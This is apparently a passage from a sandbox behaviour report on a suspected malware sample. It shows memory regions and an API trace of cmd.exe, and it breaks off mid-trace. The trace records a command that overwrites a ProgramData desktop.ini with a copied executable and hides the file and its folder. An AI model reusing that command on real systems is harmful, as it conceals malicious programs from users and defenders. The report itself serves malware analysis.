19821 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19822 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19823 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 19824 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 19825 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 19826 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 19827 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19828 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 19853 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 303 os_tid = 0xc98 [0150.778] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fbcc | out: lpSystemTimeAsFileTime=0x30fbcc*(dwLowDateTime=0x93cd7fa0, dwHighDateTime=0x1d440a9)) [0150.778] GetCurrentProcessId () returned 0xc28 [0150.778] GetCurrentThreadId () returned 0xc98 [0150.778] GetTickCount () returned 0x2e9e1 [0150.778] QueryPerformanceCounter (in: lpPerformanceCount=0x30fbc4 | out: lpPerformanceCount=0x30fbc4*=20756705042) returned 1 [0150.779] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0150.779] __set_app_type (_Type=0x1) [0150.779] __p__fmode () returned 0x76b331f4 [0150.779] __p__commode () returned 0x76b331fc [0150.779] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0150.779] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0150.779] GetCurrentThreadId () returned 0xc98 [0150.779] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc98) returned 0x38 [0150.779] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.779] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0150.779] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.780] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0150.780] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fb5c | out: phkResult=0x30fb5c*=0x0) returned 0x2 [0150.780] VirtualQuery (in: lpAddress=0x30fb93, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.780] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0150.780] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0150.780] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.780] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fb2c, dwLength=0x1c | out: lpBuffer=0x30fb2c*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0150.780] GetConsoleOutputCP () returned 0x1b5 [0150.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.780] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0150.780] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.780] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0150.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.781] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.781] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.781] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.781] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.781] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0150.781] GetEnvironmentStringsW () returned 0x410458* [0150.782] FreeEnvironmentStringsW (penv=0x410458) returned 1 [0150.782] GetEnvironmentStringsW () returned 0x410458* [0150.782] FreeEnvironmentStringsW (penv=0x410458) returned 1 [0150.782] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eacc | out: phkResult=0x30eacc*=0x40) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x8, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x1, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x1, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x0, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x40, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x40, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.782] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x40, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.782] RegCloseKey (hKey=0x40) returned 0x0 [0150.782] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eacc | out: phkResult=0x30eacc*=0x40) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x40, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x1, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x1, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x0, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x9, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x4, lpData=0x30ead8*=0x9, lpcbData=0x30ead0*=0x4) returned 0x0 [0150.783] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ead4, lpData=0x30ead8, lpcbData=0x30ead0*=0x1000 | out: lpType=0x30ead4*=0x0, lpData=0x30ead8*=0x9, lpcbData=0x30ead0*=0x1000) returned 0x2 [0150.783] RegCloseKey (hKey=0x40) returned 0x0 [0150.783] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886379 [0150.783] srand (_Seed=0x5b886379) [0150.783] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"" [0150.783] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"" [0150.783] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.784] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411bb8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0150.784] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.784] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.784] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.784] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0150.784] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0150.784] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0150.784] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0150.784] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0150.784] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0150.784] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0150.784] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0150.784] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0150.784] GetEnvironmentStringsW () returned 0x4125a8* [0150.784] FreeEnvironmentStringsW (penv=0x4125a8) returned 1 [0150.784] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.785] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.785] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0150.785] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0150.785] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0150.785] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0150.785] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0150.785] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0150.785] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0150.785] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0150.785] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f898 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.785] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f898, lpFilePart=0x30f894 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f894*="Desktop") returned 0x18 [0150.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.785] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f614 | out: lpFindFileData=0x30f614) returned 0x410c38 [0150.785] FindClose (in: hFindFile=0x410c38 | out: hFindFile=0x410c38) returned 1 [0150.785] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f614 | out: lpFindFileData=0x30f614) returned 0x410c38 [0150.786] FindClose (in: hFindFile=0x410c38 | out: hFindFile=0x410c38) returned 1 [0150.786] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f614 | out: lpFindFileData=0x30f614) returned 0x410c38 [0150.786] FindClose (in: hFindFile=0x410c38 | out: hFindFile=0x410c38) returned 1 [0150.786] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.786] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0150.786] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0150.786] GetEnvironmentStringsW () returned 0x410458* [0150.786] FreeEnvironmentStringsW (penv=0x410458) returned 1 [0150.786] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.787] GetConsoleOutputCP () returned 0x1b5 [0150.787] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.787] GetUserDefaultLCID () returned 0x409 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f9d8, cchData=128 | out: lpLCData="0") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f9d8, cchData=128 | out: lpLCData="0") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f9d8, cchData=128 | out: lpLCData="1") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0150.788] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0150.788] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0150.789] GetConsoleTitleW (in: lpConsoleTitle=0x400a98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.790] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0150.790] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0150.790] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0150.791] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0150.791] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0150.791] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0150.791] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0150.791] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0150.791] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0150.791] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0150.793] _wcsicmp (_String1="del", _String2=")") returned 59 [0150.794] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0150.794] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0150.794] _wcsicmp (_String1="IF", _String2="del") returned 5 [0150.794] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0150.794] _wcsicmp (_String1="REM", _String2="del") returned 14 [0150.794] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0150.796] _wcsicmp (_String1="type", _String2=")") returned 75 [0150.796] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0150.796] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0150.796] _wcsicmp (_String1="IF", _String2="type") returned -11 [0150.796] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0150.796] _wcsicmp (_String1="REM", _String2="type") returned -2 [0150.796] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0150.876] SetErrorMode (uMode=0x0) returned 0x0 [0150.876] SetErrorMode (uMode=0x1) returned 0x0 [0150.876] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x410460, lpFilePart=0x30f18c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f18c*="Desktop") returned 0x18 [0150.876] SetErrorMode (uMode=0x0) returned 0x1 [0150.876] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.876] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.882] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.883] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0xffffffff [0150.883] GetLastError () returned 0x2 [0150.883] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0xffffffff [0150.883] GetLastError () returned 0x2 [0150.883] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0x410638 [0150.884] FindClose (in: hFindFile=0x410638 | out: hFindFile=0x410638) returned 1 [0150.884] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0xffffffff [0150.884] GetLastError () returned 0x2 [0150.884] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0x410638 [0150.884] FindClose (in: hFindFile=0x410638 | out: hFindFile=0x410638) returned 1 [0150.884] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.884] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.884] GetConsoleTitleW (in: lpConsoleTitle=0x30f400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.884] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f288, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f350 | out: lpAttributeList=0x30f288, lpSize=0x30f350) returned 1 [0150.884] UpdateProcThreadAttribute (in: lpAttributeList=0x30f288, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f348, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f288, lpPreviousValue=0x0) returned 1 [0150.884] GetStartupInfoW (in: lpStartupInfo=0x30f244 | out: lpStartupInfo=0x30f244*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.885] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.886] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f2e4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f330 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", lpProcessInformation=0x30f330*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcfc, dwThreadId=0xa18)) returned 1 [0150.949] CloseHandle (hObject=0x4c) returned 1 [0150.949] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.949] GetEnvironmentStringsW () returned 0x410878* [0150.949] FreeEnvironmentStringsW (penv=0x410878) returned 1 [0150.949] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0151.189] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f224 | out: lpExitCode=0x30f224*=0x0) returned 1 [0151.189] CloseHandle (hObject=0x50) returned 1 [0151.190] _vsnwprintf (in: _Buffer=0x30f36c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f230 | out: _Buffer="00000000") returned 8 [0151.190] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0151.190] GetEnvironmentStringsW () returned 0x412598* [0151.190] FreeEnvironmentStringsW (penv=0x412598) returned 1 [0151.190] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0151.190] GetEnvironmentStringsW () returned 0x412598* [0151.190] FreeEnvironmentStringsW (penv=0x412598) returned 1 [0151.190] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f288 | out: lpAttributeList=0x30f288) [0151.190] GetConsoleTitleW (in: lpConsoleTitle=0x30f608, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.191] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x30e680, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x30e684, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x30e680*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0151.191] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0151.191] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0151.191] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0151.191] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\desktop.ini")) returned 0xffffffff [0151.191] GetLastError () returned 0x2 [0151.191] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF" (normalized: "c:\\users\\alluse~1\\micros~1\\mf")) returned 0x2010 [0151.192] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0151.192] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0151.192] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\desktop.ini")) returned 0xffffffff [0151.192] 